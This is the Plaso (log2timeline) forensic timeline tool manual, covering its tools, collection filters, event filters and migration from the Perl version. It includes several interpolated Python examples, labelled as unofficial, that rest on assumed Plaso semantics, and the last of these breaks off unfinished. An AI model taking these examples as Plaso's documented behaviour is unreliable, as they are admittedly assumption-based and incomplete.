Plaso (log2timeline), Release 20201007
Oct 26, 2020
CONTENTS

1 User documentation (p. 3)
  1.1 User's Guide (p. 3)
    1.1.1 How to get started (p. 3)
    1.1.2 Installing the packaged release (p. 3)
    1.1.3 Before we start (p. 3)
    1.1.4 The tools (p. 4)
  1.2 Creating a timeline (p. 5)
    1.2.1 Using psteal (p. 5)
  1.3 Collection Filters (p. 5)
    1.3.1 Using Forensic Artifacts definitions (p. 5)
    1.3.2 Using filter files (p. 6)
    1.3.3 References (p. 7)
  1.4 Event filters (p. 7)
    1.4.1 How do event filters work (p. 8)
    1.4.2 Example event filter expressions (p. 8)
    1.4.3 References (p. 9)
  1.5 Analysis Plugins (p. 9)
  1.6 Tips and Tricks (p. 9)
    1.6.1 Import the output of a third party tool into Plaso (p. 9)
  1.7 Switching from Log2Timeline Perl (Legacy) to Plaso (p. 9)
    1.7.1 Old method (p. 10)
    1.7.2 New method (p. 11)
2 Developer documentation (p. 15)
  2.1 Developer Guide (p. 15)
    2.1.1 Setting up and maintaining your development environment (p. 15)
    2.1.2 Getting Started (p. 15)
    2.1.3 Design (p. 16)
    2.1.4 Roadmap (p. 16)
    2.1.5 Contributing Code (p. 16)
  2.2 Style Guide (p. 17)
    2.2.1 Plaso specific style points (p. 17)
  2.3 How to write a parser (p. 18)
    2.3.1 Introduction (p. 18)
    2.3.2 Format (p. 19)
    2.3.3 Parsers vs. Plugins (p. 19)
    2.3.4 Test data (p. 19)
    2.3.5 Parsers, formatters, events and event data (p. 19)
  2.4 How to write a parser plugin (p. 21)
  2.5 How to write an analysis plugin (p. 21)
    2.5.1 Create file and class (p. 21)
    2.5.2 Write minimal tests (p. 21)
    2.5.3 Develop plugin (p. 22)
    2.5.4 Expand tests (p. 22)
    2.5.5 Register classes (p. 22)
    2.5.6 Code review/submit (p. 22)
  2.6 How to write an output module (p. 22)
    2.6.1 Create file and class (p. 22)
    2.6.2 Write minimal tests (p. 22)
    2.6.3 Develop plugin (p. 23)
    2.6.4 Expand tests (p. 23)
    2.6.5 Register classes (p. 23)
    2.6.6 Code review/submit (p. 23)
3 Troubleshooting (p. 25)
  3.1 Quick list (p. 25)
    3.1.1 Performance related issues (p. 26)
  3.2 Isolating errors (p. 26)
  3.3 Producing debug logs (p. 27)
  3.4 Import errors (p. 27)
  3.5 Crashes, hangs and tracebacks (p. 27)
    3.5.1 A worker segfault-ing (p. 28)
    3.5.2 A worker gives a killed status (p. 28)
    3.5.3 Which processes are running (p. 28)
    3.5.4 Analyzing crashes with single process and debug mode (p. 28)
    3.5.5 Analyzing crashes with gdb (p. 29)
  3.6 High memory usage (p. 29)
  3.7 MacOS specific issues (p. 29)
    3.7.1 How do I remove a Plaso installation (p. 29)
    3.7.2 PyParsing errors (p. 30)
    3.7.3 ImportError: cannot import name dependencies (p. 30)
    3.7.4 You used pip without virtualenv and have messed up your site-packages (p. 30)
  3.8 Ubuntu Linux specific issues (p. 30)
    3.8.1 Origin of an installed package (p. 30)
  3.9 Windows specific issues (p. 30)
    3.9.1 Not a valid Win32 application (p. 30)
    3.9.2 Unable to find an entry point in DLL (p. 31)
    3.9.3 setup.py and build errors (p. 31)
4 Supported Formats (p. 33)
  4.1 Storage Media Image File Formats (p. 33)
  4.2 Volume System Formats (p. 33)
  4.3 File System Formats (p. 33)
  4.4 File formats (p. 33)
  4.5 Bencode file formats (p. 35)
  4.6 ESE database file formats (p. 35)
  4.7 OLE Compound File formats (p. 35)
  4.8 Property list (plist) formats (p. 35)
  4.9 SQLite database file formats (p. 35)
  4.10 Windows Registry formats (p. 36)
  4.11 Hashers Supported (p. 37)
5 plaso package (p. 39)
  5.1 Subpackages (p. 39)
    5.1.1 plaso.analysis package (p. 39)
    5.1.2 plaso.analyzers package (p. 54)
    5.1.3 plaso.cli package (p. 62)
    5.1.4 plaso.containers package (p. 97)
    5.1.5 plaso.engine package (p. 120)
    5.1.6 plaso.filters package (p. 152)
    5.1.7 plaso.formatters package (p. 166)
    5.1.8 plaso.lib package (p. 183)
    5.1.9 plaso.multi_processing package (p. 191)
    5.1.10 plaso.output package (p. 199)
    5.1.11 plaso.parsers package (p. 215)
    5.1.12 plaso.preprocessors package (p. 437)
    5.1.13 plaso.serializer package (p. 444)
    5.1.14 plaso.storage package (p. 445)
    5.1.15 plaso.unix package (p. 490)
    5.1.16 plaso.winnt package (p. 490)
  5.2 Submodules (p. 491)
  5.3 plaso.dependencies module (p. 491)
  5.4 Module contents (p. 491)
6 Indices and tables (p. 493)
Python Module Index (p. 495)
Index (p. 501)
Plaso (Plaso Langar Að Safna Öllu), or "super timeline all the things", is a Python-based engine used by several tools for the automatic creation of timelines. Plaso's default behavior is to create super timelines, but it also supports creating more targeted timelines.
These timelines support digital forensic investigators and analysts in correlating the large amount of information found in logs and other files on an average computer.
The source code is available from the project page.
1 User documentation
1.1 User’s Guide
1.1.1 How to get started
First determine which version of Plaso is most suitable to your needs; for more information see Releases and roadmap.
1.1.2 Installing the packaged release
To get Plaso up and running quickly:
• Docker for Linux, Mac OS and Windows.
Alternative options:
• Fedora
• MacOS
• Ubuntu
If you run into problems installing, check out the installation troubleshooting guide.
1.1.3 Before we start
Please report all discovered bugs on the issue tracker.
To follow announcements from the Plaso team or send in generic inquiries or discuss the tool:
• subscribe to the log2timeline-discuss mailing list.
• join the Plaso channel, part of the open-source-dfir Slack community; more information can be found here.
I know the good old Perl version
If you are one of those people that liked the old Perl version of log2timeline but would really like to switch and use all the nifty features of the Python version: fear not, here is a guide to help you migrate.
1.1.4 The tools
Though Plaso was initially created to replace the Perl version of log2timeline, its focus has shifted from a stand-alone tool to a set of modules that can be used in various use cases. Fear not, Plaso is not a developers-only project; it also includes several command line tools, each with its specific purpose. Currently these are:
• image_export
• log2timeline
• pinfo
• psort
• psteal
Note that each tool can be invoked with the -h or --help command line flag to display basic usage and commandline option information.
image_export
image_export is a command line tool to export file content from a storage media image or device based on various filter criteria, such as extension names, filter paths, file format signature identifiers, file creation date and time ranges, etc.
log2timeline
log2timeline is a command line tool to extract events from individual files, recursing a directory (e.g. a mount point) or a storage media image or device. log2timeline creates a Plaso storage file which can be analyzed with the pinfo and psort tools.
The Plaso storage file contains the extracted events and various metadata about the collection process alongside information collected from the source data. It may also contain information about tags applied to events and reports from analysis plugins.
pinfo
pinfo is a command line tool to provide information about the contents of a Plaso storage file.
psort
psort is a command line tool to post-process Plaso storage files. It allows you to filter, sort and run automatic analysis on the contents of Plaso storage files.
psteal
psteal is a command line tool that combines the functionality of log2timeline and psort.
1.2 Creating a timeline
1.2.1 Using psteal
The quickest way to generate a timeline with Plaso is to use the "psteal" front-end. A command line like:
psteal.py --source ~/cases/greendale/registrar.dd -o l2tcsv -w /tmp/registrar.csv
will produce a CSV file containing all the events from the image, with sensible defaults.
1.3 Collection Filters
When you know beforehand which files are relevant for your analysis and which are not, you can use collection filters to instruct Plaso to only collect events from those files. This is also referred to as targeted collection.
Plaso supports the following methods of targeted collection:
• Using Forensic Artifacts definitions
• Using filter files
Note that at the moment the different collection filters cannot be used simultaneously.
1.3.1 Using Forensic Artifacts definitions
Forensic Artifacts definitions provide a more analyst centric approach to collection filters.
For example based on the definition:
name: WindowsEventLogSystem
doc: System Windows Event Log.
sources:
- type: FILE
  attributes:
    paths: ['%%environ_systemroot%%\System32\winevt\Logs\SysEvent.evt']
    separator: '\'
conditions: [os_major_version < 6]
labels: [Logs]
supported_os: [Windows]
urls: ['https://forensicswiki.xyz/wiki/index.php?title=Windows_Event_Log_(EVT)']
‘WindowsEventLogSystem’ refers to the path ‘%SystemRoot%\System32\winevt\Logs\SysEvent.evt’.
To use:
log2timeline.py --artifact-filters WindowsEventLogSystem name.plaso source.raw
Note that for convenience the Forensic Artifacts definition names can also be stored in a file.
1.3.2 Using filter files
Due to limitations in the original text-based filter file format, the YAML-based filter format was introduced. We recommend using the YAML-based format.
A YAML-based filter can be used to describe the path of each file or directory Plaso should include in or exclude from parsing.
• Inclusion filters are applied before exclusion filters.
• Specifying the path of a directory will include or exclude its files and subdirectories.
Path filters are case sensitive when compared to a case sensitive file system and case insensitive when compared to a case insensitive file system.
To use:
log2timeline.py --file-filter windows.yaml name.plaso source.raw
Text-based filter file format
A text-based filter can be used to describe the path of each file or directory Plaso should include in parsing.
Note that the text-based filter file does not support exclusion filters. If you need this functionality use the YAML-based filter file instead.
The text-based filter file itself contains one path filter per line, or a line starting with # for a comment.
# This is comment.
/ segment1 / segment2 / segment3 / ...
{systemroot} / segment2 / segment3 / ...
The path segment separator is a forward slash ‘/’.
A path segment can be defined as
• a string representing the exact name of the directory or file;
• a regular expression representing the name of the directory or file;
• a path expansion variable, denoted by a curly bracket, such as {systemroot}.
The path must be an absolute path, meaning that it should start with '/' or with a path expansion variable that Plaso was able to resolve during preprocessing. Plaso will ignore path filters it does not consider valid.
For example:
{systemroot}/System32/config/.+[.]evt
/(Users|Documents And Settings)/.+/AppData/Roaming/Mozilla/Firefox/Profiles/.+/places.sqlite
The first line defines a path filter that uses the "systemroot" path expansion variable, which is discovered during preprocessing and denotes the Windows SystemRoot folder. It will then process the directories and files with a name that ends with ".evt".
The second line defines a path filter using both regular expressions and strings to denote the location of Firefox history files.
YAML-based filter file format
A YAML-based filter can be used to describe the path of each file or directory Plaso should include in or exclude from parsing.
Include filters have precedence above exclude filters.
A path filter is defined as a set of attributes:
• "description": optional description of the purpose of the path filter;
• "paths": one or more paths to filter, each defined as a regular expression;
• "path_separator": optional path segment separator, which is '/' by default;
• "type": required filter type, either "include" or "exclude".
For example:
description: Windows Event Log files.
type: include
path_separator: '\'
paths:
- '%SystemRoot%\\System32\\config\\.+[.]evt'
---
description: Exclude Linux binaries.
type: exclude
paths:
- '/usr/bin'
Note that if you use \ as a path segment separator it must be escaped as part of the regular expression.
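As an added worked example (not part of the Plaso documentation or code base), the following Python script reads the two filter documents above with a small hand-written reader for this YAML subset, compiles the path expressions, and decides whether a candidate path would be processed. The value that %SystemRoot% resolves to is a constructed assumption standing in for Plaso's preprocessing, and the reading of "include filters have precedence above exclude filters" as "a path matching an include filter is processed even when an exclude filter also matches" is an assumption made for the example; consult the Plaso source for edge cases.

```python
import re

# Constructed sample: the two filter documents shown above, in the YAML layout
# of a Plaso filter file. A minimal hand-written reader is used so the example
# runs without PyYAML; it understands scalar keys and the list under "paths".
SAMPLE_FILTER_FILE = r"""
description: Windows Event Log files.
type: include
path_separator: '\'
paths:
- '%SystemRoot%\\System32\\config\\.+[.]evt'
---
description: Exclude Linux binaries.
type: exclude
paths:
- '/usr/bin'
"""

# Assumed outcome of preprocessing on the examined system (constructed value).
SAMPLE_ENVIRONMENT = {'%SystemRoot%': 'C:\\Windows'}


def _unquote(value):
    """Strip one layer of YAML quotes; escape sequences are not interpreted."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in '\'"':
        return value[1:-1]
    return value


def parse_filter_file(text):
    """Return one dict per YAML document: description, type, path_separator, paths."""
    filters, current = [], None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith('#'):
            continue
        if line == '---':                       # document separator
            if current:
                filters.append(current)
            current = None
            continue
        if current is None:                     # defaults for a new document
            current = {'path_separator': '/', 'paths': []}
        if line.startswith('- '):               # list item under "paths"
            current['paths'].append(_unquote(line[2:].strip()))
            continue
        key, _, value = line.partition(':')
        if key.strip() != 'paths':
            current[key.strip()] = _unquote(value.strip())
    if current:
        filters.append(current)
    for path_filter in filters:
        if path_filter.get('type') not in ('include', 'exclude'):
            raise ValueError('filter "type" must be include or exclude')
    return filters


def compile_filters(filters, environment, case_sensitive=True):
    """Compile each path expression into (type, pattern, separator).

    Expansion variables are replaced by their re.escape'd value so separators
    inside the value stay literal. Matching is case insensitive only when the
    examined file system is.
    """
    flags = 0 if case_sensitive else re.IGNORECASE
    compiled = []
    for path_filter in filters:
        for expression in path_filter['paths']:
            for name, value in environment.items():
                expression = expression.replace(name, re.escape(value))
            compiled.append((path_filter['type'], re.compile(expression, flags),
                             path_filter['path_separator']))
    return compiled


def _matches(pattern, path, separator):
    """True when the pattern matches the path or one of its parent directories,
    so a directory filter also covers the files and subdirectories in it."""
    segments = path.split(separator)
    return any(pattern.fullmatch(separator.join(segments[:end]))
               for end in range(1, len(segments) + 1))


def should_process(path, compiled):
    """Decide whether the file at path would be parsed under these filters.

    Assumed reading of "include filters have precedence": a matching include
    filter wins; when include filters exist and none matches the path is
    skipped; with exclude filters only, everything not excluded is processed.
    """
    includes = [c for c in compiled if c[0] == 'include']
    if any(_matches(p, path, sep) for _, p, sep in includes):
        return True
    if includes:
        return False
    return not any(_matches(p, path, sep) for t, p, sep in compiled
                   if t == 'exclude')


if __name__ == '__main__':
    compiled = compile_filters(parse_filter_file(SAMPLE_FILTER_FILE),
                               SAMPLE_ENVIRONMENT)
    for candidate in ('C:\\Windows\\System32\\config\\SysEvent.evt',
                      'C:\\Windows\\System32\\config\\SOFTWARE', '/usr/bin/ls'):
        print(candidate, '->', should_process(candidate, compiled))
```

Note how the backslash separator of the Windows filter is written as `\\` inside the regular expression, exactly as the note above requires, while the single-quoted `path_separator: '\'` is a plain one-character string.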
1.3.3 References
• Forensic artifacts
• Targeted Timeline Collection
1.4 Event filters
Event filters are used to:
• selectively export events;
• selectively analyze events;
• apply a label to events in the tagging analysis module.
Tools that have event filter support:
• psort
1.4.1 How do event filters work
An event filter is constructed in the following way:
EXPRESSION BOOLEAN_OPERATOR EXPRESSION
Where each expression is:
ATTRIBUTE [not] OPERATOR [not] VALUE
Each expression can also be a collection of binary expressions and operators enclosed in a parenthesis.
EXPRESSION BOOLEAN_OPERATOR (EXPRESSION BINARY_OPERATOR EXPRESSION)
The following boolean operators are supported:
• and
• or
• && (and)
• || (or)
The following keywords are available:
For negative matching the keyword "not" can be placed in front of any of these keywords; that is to say, if an operator is preceded with the keyword "not" a negative match is performed.
Note that as of 20190512 special event attributes like 'message', 'source', 'source_short', 'source_long' and 'sourcetype' are considered part of the output and are no longer expanded in the event filter.
1.4.2 Example event filter expressions
parser is 'syslog' and body contains 'root'
This event filter applies to all events where:
• the event was produced by the parser named ‘syslog’ (case sensitive) and;
• the body attribute contains the substring ‘root’ (case insensitive).
Use log2timeline.py --info to retrieve a list of the names of all the available parsers, or use pinfo.py test.plaso to see a list of all parsers that were used to produce the output in the storage file.
parser contains 'firefox' AND pathspec.vss_store_number > 0
• The parser name contains the word “firefox”;
• The event was extracted from a Volume Shadow Snapshot (VSS).
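To make the grammar above concrete, here is an added example (written for this page, not Plaso's own filter implementation) of a small recursive-descent evaluator for expressions of the form ATTRIBUTE [not] OPERATOR [not] VALUE joined by and/or (also &&/||) with parentheses, run over constructed sample events. It implements the operators the examples on this page use (is, contains, iregexp/regexp, > and <); the treatment of events that lack the attribute (they never match, as described later for "username contains 'joe'") and the case sensitivity of is versus contains follow the text above.

```python
import re

# Tokens: a single-quoted value (may contain spaces), a parenthesis, or a word.
_TOKEN_RE = re.compile(r"'[^']*'|\(|\)|[^\s()]+")

# Constructed sample events shaped like the attributes an event filter sees.
SAMPLE_EVENTS = [
    {'parser': 'syslog', 'body': 'session opened for user ROOT by (uid=0)',
     'pathspec': {'vss_store_number': 0}, 'username': 'root'},
    {'parser': 'syslog', 'body': 'CRON[1234]: pam_unix(cron:session): closed',
     'pathspec': {'vss_store_number': 0}},
    {'parser': 'sqlite/firefox_history', 'body': 'https://example.com/',
     'pathspec': {'vss_store_number': 2}, 'username': 'Joe'},
]


def _literal(token):
    """Quoted tokens are strings; bare numeric tokens become integers."""
    if len(token) >= 2 and token[0] == token[-1] == "'":
        return token[1:-1]
    return int(token) if token.lstrip('-').isdigit() else token


def _lookup(event, attribute):
    """Resolve a dotted attribute such as pathspec.vss_store_number."""
    value = event
    for part in attribute.split('.'):
        if not isinstance(value, dict) or part not in value:
            return None
        value = value[part]
    return value


def _compare(actual, operator, value):
    if operator in ('is', 'equals'):            # exact, case sensitive
        return actual == value
    if operator == 'contains':                  # substring, case insensitive
        return str(value).lower() in str(actual).lower()
    if operator in ('regexp', 'iregexp'):
        flags = re.IGNORECASE if operator == 'iregexp' else 0
        return re.search(str(value), str(actual), flags) is not None
    if operator in ('>', '<'):
        if isinstance(actual, (int, float)) != isinstance(value, (int, float)):
            actual, value = str(actual), str(value)   # avoid int/str TypeError
        return actual > value if operator == '>' else actual < value
    raise ValueError('unsupported operator: %s' % operator)


class EventFilter:
    """Parser and evaluator for: EXPRESSION BOOLEAN_OPERATOR EXPRESSION."""

    def __init__(self, expression):
        self._tokens = _TOKEN_RE.findall(expression)
        self._pos = 0
        self._tree = self._parse_or()
        if self._pos != len(self._tokens):
            raise ValueError('unexpected token: %s' % self._tokens[self._pos])

    def _peek(self):
        return self._tokens[self._pos] if self._pos < len(self._tokens) else ''

    def _next(self):
        token = self._peek()
        if not token:
            raise ValueError('unexpected end of expression')
        self._pos += 1
        return token

    def _parse_or(self):                # and-expr (or and-expr)*
        node = self._parse_and()
        while self._peek().lower() in ('or', '||'):
            self._next()
            node = ('or', node, self._parse_and())
        return node

    def _parse_and(self):               # atom (and atom)*
        node = self._parse_atom()
        while self._peek().lower() in ('and', '&&'):
            self._next()
            node = ('and', node, self._parse_atom())
        return node

    def _parse_atom(self):              # "(" expr ")" | ATTRIBUTE [not] OP [not] VALUE
        token = self._next()
        if token == '(':
            node = self._parse_or()
            if self._next() != ')':
                raise ValueError('missing closing parenthesis')
            return node
        negate, operator = False, self._next()
        if operator.lower() == 'not':
            negate, operator = True, self._next()
        value = self._next()
        if value.lower() == 'not':
            negate, value = not negate, self._next()
        return ('cmp', token, operator.lower(), _literal(value), negate)

    def matches(self, event):
        return self._eval(self._tree, event)

    def _eval(self, node, event):
        if node[0] == 'and':
            return self._eval(node[1], event) and self._eval(node[2], event)
        if node[0] == 'or':
            return self._eval(node[1], event) or self._eval(node[2], event)
        _, attribute, operator, value, negate = node
        actual = _lookup(event, attribute)
        if actual is None:              # events lacking the attribute never match
            return False
        result = _compare(actual, operator, value)
        return not result if negate else result


def filter_events(expression, events=SAMPLE_EVENTS):
    """Return the indexes of the events matched by the filter expression."""
    event_filter = EventFilter(expression)
    return [i for i, event in enumerate(events) if event_filter.matches(event)]
```

Running filter_events("parser is 'syslog' and body contains 'root'") selects only the first sample event: the second is from syslog but its body does not contain "root", and the third is a Firefox history event. The Firefox example above selects the third event through its pathspec.vss_store_number attribute.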
1.4.3 References
• log2timeline filtering 101
1.5 Analysis Plugins
• nsrlsvr
• tagging
• viper
• virustotal
1.6 Tips and Tricks
This is a collection of a few tips and tricks that can be used with Plaso.
1.6.1 Import the output of a third party tool into Plaso
If you want to import the output of a third party tool into your Plaso timeline, export it to bodyfile (or mactime) format. The Plaso mactime parser can parse a bodyfile.
Note that the bodyfile format has numerous limitations; see ForensicsWiki: Bodyfile.
The Plaso mactime parser supports timestamps with a fraction of a second since Aug 25, 2020.
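As an added example (not part of the Plaso documentation or code base), the following Python code writes records from a hypothetical third-party tool in bodyfile format, using the column order of The Sleuth Kit 3.x bodyfile (MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime, times as epoch seconds). The sample records, the fixed mode string, the sequence-number inodes and the use of 0 for timestamps the tool did not report are constructed assumptions for this example; fractional seconds are emitted as the text above says the mactime parser now accepts them.

```python
import calendar
from datetime import datetime, timezone

# Constructed records standing in for the output of a hypothetical third-party
# tool: a path, a size and the UTC timestamps it reported (None = not reported).
SAMPLE_RECORDS = [
    {'path': '/home/joe/.bash_history', 'size': 2048,
     'atime': datetime(2012, 10, 10, 22, 25, 19, tzinfo=timezone.utc),
     'mtime': datetime(2012, 10, 10, 18, 24, 0, 500000, tzinfo=timezone.utc),
     'ctime': None, 'crtime': None},
    {'path': '/tmp/evil.sh', 'size': 312,
     'atime': None,
     'mtime': datetime(2012, 10, 10, 12, 0, 0, tzinfo=timezone.utc),
     'ctime': None,
     'crtime': datetime(2012, 10, 10, 11, 59, 59, 120593, tzinfo=timezone.utc)},
]


def bodyfile_timestamp(value):
    """Epoch seconds for a UTC datetime, keeping the fraction of a second;
    0 is used for a timestamp the tool did not report (assumed convention)."""
    if value is None:
        return '0'
    seconds = calendar.timegm(value.utctimetuple())
    if value.microsecond:
        return '%d.%06d' % (seconds, value.microsecond)
    return str(seconds)


def bodyfile_line(record, inode=0, mode='r/rrw-r--r--', uid=0, gid=0):
    """One bodyfile line. The format has no escaping, so a name containing
    the field separator or a newline cannot be represented and is rejected."""
    name = record['path']
    if '|' in name or '\n' in name:
        raise ValueError('bodyfile cannot represent this name: %r' % name)
    fields = ['0', name, str(inode), mode, str(uid), str(gid),
              str(record['size']),
              bodyfile_timestamp(record['atime']),
              bodyfile_timestamp(record['mtime']),
              bodyfile_timestamp(record['ctime']),
              bodyfile_timestamp(record['crtime'])]
    return '|'.join(fields)


def write_bodyfile(records):
    """Bodyfile text for all records; inode numbers are just sequence numbers."""
    return ''.join(bodyfile_line(record, inode=index + 1) + '\n'
                   for index, record in enumerate(records))


if __name__ == '__main__':
    # Save the output as e.g. tool_output.body and import it with the mactime
    # parser, as the text above describes:
    #   log2timeline.py --parsers mactime tool.plaso tool_output.body
    print(write_bodyfile(SAMPLE_RECORDS), end='')
```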
1.7 Switching from Log2Timeline Perl (Legacy) to Plaso
This page contains information for those that are used to using the 0.x version of log2timeline, also known as Log2Timeline Perl or Log2Timeline legacy.
The syntax has changed somewhat from the 0.x version; the largest differences may be:
• The output of the tool is no longer controllable through the log2timeline.py command line tool (or front-end). There is only one storage mechanism and that is the Plaso storage file. To produce an output file comparable with the 0.x version you will need to run the psort.py command line tool with the l2t_csv output module.
• The log2timeline.py command line tool can extract events directly from storage media images, such as raw or E01, removing the need to mount these images manually.
• The names of the parsers have changed. There are numerous new parsers, but note that some of the older parsers have not been ported.
• The post-processing tool is no longer called l2t_process, it is now named psort.py.
• The command line parameters and options have changed considerably. More information below.
In the information below the name Plaso is the name of the new back-end as opposed to Log2Timeline, which is the old Perl back-end. log2timeline.py is a CLI tool (or front-end). There are other front-ends to the tool though, for example Timesketch.
Let’s go over the old and new method of collecting a timeline from a raw storage media image file.
1.7.1 Old method
First of all we needed to mount the image. Something like this:
sudo mount -t ntfs-3g -o ro,nodev,noexec,show_sys_files,streams_interface=windows,loop,offset=32256 image.dd /mnt/ntfs
Then we needed to run log2timeline against the mount point. You needed to define the timezone of the suspect image, which could get overwritten if a correct value was found, and you needed to define which parsers to use. The sample run is:
cd /mnt/ntfs
log2timeline -r -p -z CST6CDT -f win7 . > /cases/timeline/myhost.csv 2> /cases/timeline/myhost.log
This would pick all the parsers defined in the "win7" list and run those against every file found in the mount point. A list of all available parsers and lists could be produced by running:
log2timeline -f list
As noted earlier, the above approach would produce a large "kitchen-sink" timeline that is not sorted. To sort that one (no filtering):
cd /cases/timeline
l2t_process.py -b myhost.csv > myhost.sorted.csv
Now we would have a large sorted CSV file ready to analyze.
Limiting the output to a specific date could be achieved using methods like:
l2t_process.py -b myhost.csv 10-10-2012..10-11-2012
However, you could not limit the output of the timeline to a narrower timeframe than a single day; for that you needed grep (or some other tool of choice).
l2t_process.py -b myhost.csv 10-10-2012..10-11-2012 | grep ",1[8-9]:[0-5][0-9]:[0-9][0-9],"
And filtering based on content was constrained to few options:
• Use a keyword file that contained case-insensitive regular expressions to include or exclude events.
• Use a YARA rule that matched against the description_long field.
• Use grep/sed/awk.
The problem with most of the l2t_process filtering is that it was done either on the whole line or against the description_long field. There was no easy way to filter against a more specific attribute of the event.
1.7.2 New method
Since the new version works directly on a raw image file there is no need to mount the image first (and mounting them is actually highly discouraged); the timeline can be created in a single step:
log2timeline.py /cases/timeline/myhost.plaso image.dd
The tool will detect whether the input is a file, a directory or a disk image/partition. If the tool requires additional information, such as when VSS stores are detected or the volume contains more than a single partition, the tool will ask for additional details. An example of that:
The following Volume Shadow Snapshots (VSS) were found:
Identifier    VSS store identifier                    Creation Time
vss1          23b509aa-3499-11e3-be88-24fd52566ede    2013-10-16T13:18:01.685825+00:00
vss2          8dfc93b3-376f-11e3-be88-24fd52566ede    2013-10-18T00:28:29.120593+00:00
vss3          dc8ffcf4-3a6b-11e3-be8a-24fd52566ede    2013-10-21T19:24:50.879381+00:00

Please specify the identifier(s) of the VSS that should be processed:
Note that a range of stores can be defined as: 3..5. Multiple stores can
be defined as: 1,3,5 (a list of comma separated values). Ranges and lists can
also be combined as: 1,3..5. The first store is 1. If no stores are specified
none will be processed. You can abort with Ctrl^C.
The options can also be supplied on the command line: --vss_stores '1,2' to define the VSS stores to parse, --no-vss to skip VSS stores altogether, or --vss_stores all to process all VSS stores.
Selecting a specific partition can likewise be done on the command line, without calculating the offset into the disk image:
log2timeline.py --partitions 2 /cases/timeline/myhost.plaso image.dd
First of all there is quite a difference in the number of parameters, let’s go slightly over them:
• There is no -r for recursive: when the tool is run against an image or a directory, recursion is automatically assumed; run it against a single file and recursion is not turned on.
• There is no need to supply the tool with -p (preprocessing) when run against an image; that is automatically turned on.
• The -z CST6CDT is not used here. The tool automatically picks up the timezone and uses that. However, in case the timezone is not identified the option is still available, and if it is not provided UTC is used as the timezone.
• You may have noticed there is no -f list parameter used. The notion of selecting filters is now removed and is done automatically. The way the tool now works is that it tries to "guess" the OS and select the appropriate parsers based on that selection. The categories that are available can be found here or by issuing log2timeline.py --info. If you want to override the automatic selection of parsers you can define them using the --parsers parameter.
• You have to supply the tool with the parameter to define where to save the output (it can no longer just output to STDOUT to be piped to a file).
The equivalent of the old tool's -f list can now be found using --info. That will print out all available parsers and plugins in the tool. One thing to take note of is the different concepts of plugins and parsers. In the old tool there was just the notion of a parser, whose purpose it was to parse a single file/artifact. However, Plaso introduces both plugins and parsers, and there is a distinction between the two. The parser understands and parses file formats, whereas a plugin understands data inside file formats. So in the case of the Windows Registry the parser understands the file format of the registry and parses that, but it is the purpose of a plugin to read the actual key content and produce meaningful data from it. The same goes for SQLite databases: the parser understands how to read SQLite databases while the plugins understand the data in them. An example of a SQLite plugin is the Chrome History plugin, or the Firefox History plugin. Both are SQLite databases so they use the same parser, but the data stored in them is different, thus we need a plugin for that.
To see the list of presets that are available use the --info parameter. The old tool allowed you to indicate which presets you wanted using the -f parameter. In the new version this same functionality is exposed as the --parsers parameter. Example usage of this parameter is:
log2timeline.py --parsers "win7" /cases/timeline/myhost.plaso image.dd
log2timeline.py --parsers "win7,\!winreg" /cases/timeline/myhost.plaso image.dd
log2timeline.py --parsers "winreg,winevt,winevtx" /cases/timeline/myhost.plaso image.dd
There is another difference: the old tool used l2t_csv as the default output, which could be configured using the -o parameter of log2timeline. This output was all saved in a single file that was unsorted, which meant that a post-processing tool called l2t_process needed to be run to sort the output and remove duplicate entries before analysis started (you could however immediately start to grep the output).
log2timeline.py does not allow you to control the output; there is only one available output and that is the Plaso storage file. The Plaso storage file contains additional metadata about how log2timeline.py was run, information gathered during pre-processing, warnings about data that could not be parsed and other useful information that could not be stored in the older format.
The downside of the storage format is that you can no longer immediately start to grep or analyze the output of the tool; now you need to run a second tool to sort, remove duplicates and change it into a human readable format.
psort.py -w /cases/timeline/myhost.sorted.csv /cases/timeline/myhost.plaso
There is a command line tool psteal.py which runs log2timeline.py and psort.py in a single invocation.
With the new storage format and the filtering possibilities of psort, many new things are now available that were not possible in the older version. For instance the possibility to scope the time window of the output to a few minutes:
psort.py /cases/timeline/myhost.plaso "date > '2012-10-10 18:24:00' and date < '2012-10-10 22:25:19'"
Or to a specific dataset:
psort.py /cases/timeline/myhost.plaso "date > '2012-10-10 12:00:00' and date < '2012-10-10 23:55:14' and message contains 'evil' and (source is 'LNK' or timestamp_desc iregexp 'st\swr' or filename contains 'mystery')"
Or to just present a small time slice based on a particular event of interest:
psort.py --slice "2012-10-10T12:00:00" /cases/timeline/myhost.plaso
More information about event filters can be found here.
The main difference between the old branch and the new one is that now filtering is a lot more granular, and also very different. It is possible to filter against every attribute that is stored inside the event. Some types of events will store certain attributes, while others will not.
psort.py /cases/timeline/myhost.plaso "username contains 'joe'"
A filter like the one above will go through every event and only include those events that actually have the attribute username set, which may not be nearly all of them (only those events that can positively attribute an event to a specific user). It then narrows those events down further by only including the events that contain the letters “joe” (case insensitive).
The most common usage of the filters will most likely be constrained to the common fields, like source/source_short,date/timestamp, source_long, message, filename, timestamp_desc, parser, etc.
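To make the semantics described above concrete, here is an added, stand-alone Python evaluator for filter expressions of the kind used in these examples; it is not Plaso's own filter engine and supports only the operators shown here (is, contains, iregexp, >, <, and, or, parentheses). The sample events are constructed, and attribute names follow the common fields listed above.

```python
"""Minimal evaluator for psort-style event filter expressions.

Added, stand-alone example: not Plaso's own filter engine (plaso.filters). It
covers the operators used above (is, contains, iregexp, >, <), and/or and
parentheses, and the rule that an event lacking an attribute never matches.
"""
import re

OPERATORS = frozenset(['is', 'contains', 'iregexp', '>', '<'])
# Tokens: parentheses, quoted literals (backslashes kept, so 'st\swr' survives),
# comparison operators and words (attribute names, operators, and/or).
TOKEN_RE = re.compile(r"\(|\)|'(?:[^'\\]|\\.)*'|>|<|[A-Za-z_][A-Za-z0-9_]*")


def tokenize(text):
  """Splits a filter expression into tokens; stray characters are an error."""
  tokens = TOKEN_RE.findall(text)
  if re.sub(r'\s', '', ''.join(tokens)) != re.sub(r'\s', '', text):
    raise ValueError('unexpected characters in: {0:s}'.format(text))
  return tokens


def parse_filter(text):
  """Parses text into ('and'|'or', left, right) / ('cmp', attr, op, value)."""
  tokens = tokenize(text)

  def take():
    if not tokens:
      raise ValueError('unexpected end of expression')
    return tokens.pop(0)

  def parse_chain(keyword, parse_operand):
    left = parse_operand()
    while tokens and tokens[0] == keyword:
      take()
      left = (keyword, left, parse_operand())
    return left

  def parse_or():
    return parse_chain('or', lambda: parse_chain('and', parse_term))

  def parse_term():
    token = take()
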